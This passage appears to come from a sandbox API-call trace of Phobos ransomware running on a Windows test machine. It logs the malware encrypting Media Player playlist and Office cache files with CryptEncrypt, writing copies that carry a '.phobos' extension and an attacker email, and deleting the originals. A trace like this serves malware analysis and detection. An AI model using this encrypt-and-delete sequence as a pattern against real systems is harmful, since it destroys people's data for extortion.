lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1063) returned 1 [0188.298] CloseHandle (hObject=0x178) returned 1 [0188.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl")) returned 0x2020 [0188.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.299] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.299] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.299] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0188.299] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.299] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x427, lpOverlapped=0x0) returned 1 [0188.440] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x430, dwBufLen=0x430 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x430) returned 1 [0188.530] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x430, lpOverlapped=0x0) returned 1 [0188.531] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0188.531] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.531] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0188.531] CryptDestroyKey (hKey=0xa32de8) returned 1 [0188.531] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0188.531] CryptDestroyKey (hKey=0xa32a68) returned 1 [0188.531] CloseHandle (hObject=0x178) returned 1 [0188.548] CloseHandle (hObject=0x134) returned 1 [0188.588] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl")) returned 1 [0188.589] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.590] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=585) returned 1 [0188.591] CloseHandle (hObject=0x134) returned 1 [0188.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl")) returned 0x2020 [0188.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.591] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.591] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.592] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0188.592] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.592] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x249, lpOverlapped=0x0) returned 1 [0188.593] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x250, dwBufLen=0x250 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x250) returned 1 [0188.593] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x250, lpOverlapped=0x0) returned 1 [0188.594] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0188.594] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.594] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0188.594] CryptDestroyKey (hKey=0xa32de8) returned 1 [0188.594] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0188.595] CryptDestroyKey (hKey=0xa32a68) returned 1 [0188.595] CloseHandle (hObject=0x134) returned 1 [0188.595] CloseHandle (hObject=0x178) returned 1 [0188.595] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl")) returned 1 [0188.596] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.597] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1079) returned 1 [0188.597] CloseHandle (hObject=0x178) returned 1 [0188.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl")) returned 0x2020 [0188.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.597] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.598] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.598] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0188.599] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.599] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x437, lpOverlapped=0x0) returned 1 [0188.600] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x440, dwBufLen=0x440 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x440) returned 1 [0188.600] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x440, lpOverlapped=0x0) returned 1 [0188.603] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0188.603] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.603] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0188.603] CryptDestroyKey (hKey=0xa32de8) returned 1 [0188.603] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0188.603] CryptDestroyKey (hKey=0xa32a68) returned 1 [0188.603] CloseHandle (hObject=0x178) returned 1 [0188.603] CloseHandle (hObject=0x134) returned 1 [0188.603] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl")) returned 1 [0188.604] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.667] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=131072) returned 1 [0188.667] CloseHandle (hObject=0x178) returned 1 [0188.667] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd")) returned 0x2020 [0188.667] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.668] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.668] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.669] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32d28) returned 1 [0188.669] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.669] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x20000, lpOverlapped=0x0) returned 1 [0188.680] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20010, dwBufLen=0x20010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20010) returned 1 [0188.681] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20010, lpOverlapped=0x0) returned 1 [0188.683] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0188.683] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.683] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0188.683] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0188.683] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0188.684] CryptDestroyKey (hKey=0xa32d28) returned 1 [0188.684] CloseHandle (hObject=0x178) returned 1 [0188.684] CloseHandle (hObject=0x134) returned 1 [0188.684] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd")) returned 1 [0188.688] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.688] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.689] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=114) returned 1 [0188.689] CloseHandle (hObject=0x134) returned 1 [0188.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf")) returned 0x2020 [0188.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.693] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.693] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.694] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32d28) returned 1 [0188.694] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.694] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x72, lpOverlapped=0x0) returned 1 [0188.695] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80, dwBufLen=0x80 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80) returned 1 [0188.695] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x80, lpOverlapped=0x0) returned 1 [0188.695] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0188.695] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.695] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0188.695] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0188.695] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0188.696] CryptDestroyKey (hKey=0xa32d28) returned 1 [0188.696] CloseHandle (hObject=0x134) returned 1 [0188.696] CloseHandle (hObject=0x178) returned 1 [0188.696] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSF-CTBL.FSF" (normalized: "c:\\users\\5p5nrgjn0js 